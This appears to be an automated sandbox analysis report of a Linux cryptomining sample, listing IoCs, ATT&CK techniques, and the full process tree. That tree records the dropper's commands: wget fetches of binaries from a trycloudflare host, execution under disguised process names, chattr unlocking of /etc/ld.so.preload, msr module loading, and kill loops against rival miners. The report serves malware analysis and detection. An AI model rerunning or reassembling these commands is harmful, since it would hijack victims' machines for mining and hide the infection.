xmrig_linux | b1570e2b2c9d957d943fb37f266ec48a51bee9db0a39dcd15ceb884384f8f6a1

description	ioc
File opened for modification	/etc/ld.so.preload

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/.sock	1562	.sock
/usr/lib/procf/x	1628	x
/usr/lib/procf/kexec	1640	kexec
/usr/lib/procf/deamon-hoster	1645	deamon-hoster

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/arch/x86/kernel/msr.ko	1636	modprobe

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	xs.jpg

Attempts to change immutable files 14 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1652	xargs
1582	xargs
1587	xargs
1592	xargs
1597	xargs
1607	xargs
1602	xargs
1657	xargs
1661	chattr
1547	chattr
1548	chattr
1577	xargs
1609	chattr
1615	chattr

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

description	ioc	Process
File opened for reading	/proc/cpuinfo	x

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	x
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	x
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	x
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	x

Enumerates running processes
Discovers information about currently running processes on the system

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	api6.my-ip.io
38	api6.my-ip.io

Reads CPU attributes 1 TTPs 58 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	x
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	x
File opened for reading	/sys/devices/system/cpu/possible	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	x
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	x
File opened for reading	/sys/devices/system/cpu/online	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/topology/thread_siblings	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	x
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	x
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_siblings	x
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	x
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	x
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	x

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	x
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	x
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	x
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	x
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	x
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	x
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	x
File opened for reading	/sys/devices/virtual/dmi/id/board_name	x
File opened for reading	/sys/devices/virtual/dmi/id/board_version	x
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	x
File opened for reading	/sys/devices/virtual/dmi/id/product_version	x
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	x
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	x
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	x

Enumerates kernel/hardware configuration 1 TTPs 26 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	x
File opened for reading	/sys/devices/system/node/node0/cpumap	x
File opened for reading	/sys/devices/system/node/node0/meminfo	x
File opened for reading	/sys/devices/system/node/node0/hugepages	x
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	x
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	x
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	x
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	Process not Found
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	x
File opened for reading	/sys/firmware/dmi/tables/DMI	x
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	x
File opened for reading	/sys/devices/system/node/online	x
File opened for reading	/sys/devices/virtual/dmi/id	x
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	.sock
File opened for reading	/sys/bus/dax/devices	x
File opened for reading	/sys/devices/system/node/node0/access1/initiators	x
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	x
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	Process not Found
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	kexec
File opened for reading	/sys/devices/system/cpu	x
File opened for reading	/sys/kernel/mm/hugepages	x
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	x
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	x
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	x
File opened for reading	/sys/module/msr/initstate	modprobe
File opened for reading	/sys/devices/system/node/node0/access0/initiators	x

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/427/status	ps
File opened for reading	/proc/1147/status	ps
File opened for reading	/proc/659/cmdline	ps
File opened for reading	/proc/1013/cmdline	ps
File opened for reading	/proc/1170/cmdline	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/433/cmdline	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/156/cmdline	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/1556/cmdline	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/1153/stat	ps
File opened for reading	/proc/1008/status	ps
File opened for reading	/proc/115/stat	ps
File opened for reading	/proc/1434/cmdline	ps
File opened for reading	/proc/1186/status	ps
File opened for reading	/proc/1056/cmdline	ps
File opened for reading	/proc/32/stat	ps
File opened for reading	/proc/1147/status	ps
File opened for reading	/proc/1185/cmdline	ps
File opened for reading	/proc/591/status	ps
File opened for reading	/proc/28/status	ps
File opened for reading	/proc/1299/stat	ps
File opened for reading	/proc/1137/stat	ps
File opened for reading	/proc/473/status	ps
File opened for reading	/proc/1113/cmdline	ps
File opened for reading	/proc/1056/stat	ps
File opened for reading	/proc/1031/status	ps
File opened for reading	/proc/456/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/9/status	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/168/status	ps
File opened for reading	/proc/159/status	ps
File opened for reading	/proc/1043/stat	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/22/cmdline	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/25/cmdline	ps
File opened for reading	/proc/1086/stat	ps
File opened for reading	/proc/1121/status	ps
File opened for reading	/proc/157/status	ps
File opened for reading	/proc/159/status	ps
File opened for reading	/proc/1352/stat	ps
File opened for reading	/proc/1434/status	ps
File opened for reading	/proc/1086/status	ps
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/164/status	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/1113/stat	ps
File opened for reading	/proc/167/cmdline	ps
File opened for reading	/proc/427/stat	ps
File opened for reading	/proc/1079/stat	ps
File opened for reading	/proc/1166/cmdline	ps
File opened for reading	/proc/1068/cmdline	ps
File opened for reading	/proc/35/status	ps
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/627/stat	ps
File opened for reading	/proc/32/cmdline	ps
File opened for reading	/proc/459/cmdline	ps
File opened for reading	/proc/80/stat	ps
File opened for reading	/proc/517/cmdline	ps

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.sock	wget

/tmp/xs.jpg
/tmp/xs.jpg
1⤵
- Writes DNS configuration
PID:1545
- /bin/chmod
  chmod +wr /tmp
  2⤵
  PID:1546
- /usr/bin/chattr
  chattr -ia /tmp
  2⤵
  - Attempts to change immutable files
  PID:1547
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:1548
- /bin/cat
  cat /dev/null
  2⤵
  PID:1549
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/netsocketx -O /tmp/.sock
  2⤵
  - Writes file to tmp directory
  PID:1559
- /bin/chmod
  chmod +x /tmp/.sock
  2⤵
  PID:1560
- /bin/sleep
  sleep 1
  2⤵
  PID:1561
- /usr/bin/id
  id -u
  2⤵
  PID:1563
- /usr/bin/nohup
  nohup bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=ubuntu1804-amd64-20231215-en-9 -accept-tos"
  2⤵
  PID:1562
- /usr/local/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=ubuntu1804-amd64-20231215-en-9 -accept-tos"
  2⤵
  PID:1562
- /usr/local/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=ubuntu1804-amd64-20231215-en-9 -accept-tos"
  2⤵
  PID:1562
- /usr/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=ubuntu1804-amd64-20231215-en-9 -accept-tos"
  2⤵
  PID:1562
- /usr/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=ubuntu1804-amd64-20231215-en-9 -accept-tos"
  2⤵
  PID:1562
- /sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=ubuntu1804-amd64-20231215-en-9 -accept-tos"
  2⤵
  PID:1562
- /bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=ubuntu1804-amd64-20231215-en-9 -accept-tos"
  2⤵
  PID:1562
- /tmp/.sock
  "[network-managerr]" "[email protected]" "-password=random#123" "-device-name=ubuntu1804-amd64-20231215-en-9" -accept-tos
  2⤵
  - Executes dropped EXE
  - Enumerates kernel/hardware configuration
  PID:1562
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1571
- /bin/grep
  grep "\\[inet_frag_qw]"
  2⤵
  PID:1573
- /bin/grep
  grep -v grep
  2⤵
  PID:1575
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1576
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1577
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1578
- /bin/grep
  grep "\\[ipv6_addrconfd]"
  2⤵
  PID:1579
- /bin/grep
  grep -v grep
  2⤵
  PID:1580
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1581
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1582
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1583
- /bin/grep
  grep sysinit
  2⤵
  PID:1584
- /bin/grep
  grep -v grep
  2⤵
  PID:1585
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1586
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1587
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1588
- /bin/grep
  grep "\\[watchdodg]"
  2⤵
  PID:1589
- /bin/grep
  grep -v grep
  2⤵
  PID:1590
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1591
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1592
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1593
- /bin/grep
  grep "\\[bdus-daemon]"
  2⤵
  PID:1594
- /bin/grep
  grep -v grep
  2⤵
  PID:1595
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1596
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1597
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1598
- /bin/grep
  grep "\\[slub_flushqw]"
  2⤵
  PID:1599
- /bin/grep
  grep -v grep
  2⤵
  PID:1600
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1601
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1602
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1603
- /bin/grep
  grep deamon-hoster
  2⤵
  PID:1604
- /bin/grep
  grep -v grep
  2⤵
  PID:1605
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1606
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1607
- /usr/bin/id
  id -u
  2⤵
  PID:1608
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  - Attempts to change immutable files
  PID:1609
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:1610
- /usr/bin/id
  id -u
  2⤵
  PID:1611
- /bin/mkdir
  mkdir -p /usr/lib/procf
  2⤵
  PID:1612
- /usr/bin/id
  id -u
  2⤵
  PID:1613
- /bin/chmod
  chmod +w /usr/lib/procf
  2⤵
  PID:1614
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  - Attempts to change immutable files
  PID:1615
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:1616
- /bin/mkdir
  mkdir /usr/lib/procf
  2⤵
  PID:1617
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/x4 -O /usr/lib/procf/x
  2⤵
  PID:1619
- /bin/chmod
  chmod +x /usr/lib/procf/x
  2⤵
  PID:1620
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kexec2 -O /usr/lib/procf/kexec
  2⤵
  PID:1622
- /bin/chmod
  chmod +x /usr/lib/procf/kexec
  2⤵
  PID:1623
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kc -O /usr/lib/procf/deamon-hoster
  2⤵
  PID:1625
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster
  2⤵
  PID:1626
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster /usr/lib/procf/kexec /usr/lib/procf/x
  2⤵
  PID:1627
- /bin/sleep
  sleep 3
  2⤵
  PID:1629
- /usr/bin/nohup
  nohup bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:1628
- /usr/local/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:1628
- /usr/local/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:1628
- /usr/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:1628
- /usr/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:1628
- /sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:1628
- /bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:1628
- /usr/lib/procf/x
  "[ipv6_addrconfd]"
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  PID:1628
- - /bin/sh
    sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
    3⤵
    PID:1635
  - - /sbin/modprobe
      /sbin/modprobe msr "allow_writes=on"
      4⤵
      Loads a kernel module
      Enumerates kernel/hardware configuration
      PID:1636
- /usr/bin/nohup
  nohup bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:1640
- /bin/sleep
  sleep 3
  2⤵
  PID:1641
- /usr/local/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:1640
- /usr/local/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:1640
- /usr/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:1640
- /usr/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:1640
- /sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:1640
- /bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:1640
- /usr/lib/procf/kexec
  "[bdus-daemon]"
  2⤵
  - Executes dropped EXE
  - Enumerates kernel/hardware configuration
  PID:1640
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1660
- /usr/bin/nohup
  nohup /usr/lib/procf/deamon-hoster
  2⤵
  PID:1645
- /usr/lib/procf/deamon-hoster
  /usr/lib/procf/deamon-hoster
  2⤵
  - Executes dropped EXE
  PID:1645
- - /bin/sleep
    sleep 3
    3⤵
    PID:1647
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1648
- - /bin/grep
    grep -v grep
    3⤵
    PID:1649
- - /bin/grep
    grep miner
    3⤵
    PID:1650
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1651
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1652
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1653
- - /bin/grep
    grep -v grep
    3⤵
    PID:1654
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1655
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    - Reads runtime system information
    PID:1656
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1657
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1658
- - /bin/grep
    grep -v grep
    3⤵
    PID:1659
- - /bin/grep
    grep xmp
    3⤵
    PID:1664
- /bin/sleep
  sleep 5
  2⤵
  PID:1646
- /usr/bin/chattr
  chattr -ia /usr/lib/procf/kexec
  2⤵
  - Attempts to change immutable files
  PID:1661

/bin/ps
ps -ef
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1551

/bin/grep
grep "\\[network-managerr]"
1⤵
PID:1552

/bin/grep
grep -v grep
1⤵
PID:1553

/usr/bin/wc
wc -l
1⤵
PID:1554

/bin/hostname
hostname
1⤵
PID:1564

/bin/ps
ps -ef
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566

/bin/grep
grep "\\[ipv6_addrconfd]"
1⤵
PID:1567

/bin/grep
grep -v grep
1⤵
PID:1568

/usr/bin/wc
wc -l
1⤵
PID:1569

/bin/ps
ps aux
1⤵
PID:1665

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Hijack Execution Flow

Privilege Escalation

Hijack Execution Flow

Defense Evasion

Hijack Execution Flow

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion